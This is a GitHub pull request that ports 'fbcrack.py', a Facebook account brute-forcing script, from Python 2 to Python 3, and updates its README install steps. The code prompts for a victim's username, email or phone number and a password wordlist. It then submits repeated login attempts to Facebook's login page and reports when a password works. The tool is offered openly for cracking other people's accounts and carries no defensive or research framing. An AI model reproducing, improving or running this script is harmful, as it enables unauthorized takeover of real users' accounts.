Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Updated it for python3 as python2 has lost its support from community centre on January 1st,2020. #3

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
9 changes: 5 additions & 4 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,13 +20,14 @@
Facebook Cracker


This python program can crack facebook account and recover facebook password.
This python program can crack facebook account and recover facebook password by using wordlist provided.
###Awesome Project ####


### Installation ###

<ul>
<li>python</li>
<li>python3</li>
<li>toilet</li>
</ul>

Expand All @@ -38,9 +39,9 @@ This python program can crack facebook account and recover facebook password.
<br>
cd fbcrack4.0
<br>
sudo apt install python2-pip
sudo apt install python3-pip
<br>
sudo python2 fbcrack.py
sudo python3 fbcrack.py

### Screenshots ###

Expand Down
32 changes: 16 additions & 16 deletions fbcrack.py
Original file line number Diff line number Diff line change
Expand Up @@ -8,17 +8,17 @@

os.system("clear")
os.system("toilet -f mono12 -F crop FB Crack")
print
print 'Author : Rahat Khan Tusar(RKT)'
print
print 'Github : https://github.com/r3k4t'
print
print 'Information : This program can crack facebook account and recovery facebook password.Do not use vpn.If you use vpn and it is not work.'
print
print 'Version : 4.0'
print
email = str(raw_input("Facebook Username (or) Email (or) Phone Number : "))
passwordlist = str(raw_input("Enter the wordlist name and path : "))
print()
print('Author : Rahat Khan Tusar(RKT)')
print()
print('Github : https://github.com/r3k4t')
print()
print( 'Information : This program can crack facebook account and recovery facebook password.Do not use vpn.If you use vpn and it is not work.')
print()
print( 'Version : 4.1')
print()
email = input(" Enter Facebook Username (or) Email (or) Phone Number : ")
passwordlist = input("Enter the wordlist name and path : ")


login = 'https://www.facebook.com/login.php?login_attempt=1'
Expand Down Expand Up @@ -54,7 +54,7 @@ def brute(password):
log = sub.geturl()
if log != login and (not 'login_attempt' in log):
print("\n\n[#] Password Find = {}".format(password))
raw_input("ANY KEY to Exit....")
input(" PRESS ANY KEY to Exit....")
sys.exit(0)


Expand All @@ -75,10 +75,10 @@ def welcome():
"""
total = open(passwordlist,"r")
total = total.readlines()
print wel
print " [*] Account to crack : {}".format(email)
print " [*] Loaded :" , len(total), "passwords"
print " [*] Cracking, please wait ...\n\n"
print(wel)
print( " [*] Account to crack : {}".format(email))
print(" [*] Loaded :" , len(total), "passwords")
print( " [*] Cracking, please wait ...\n\n")


if __name__ == '__main__':
Expand Down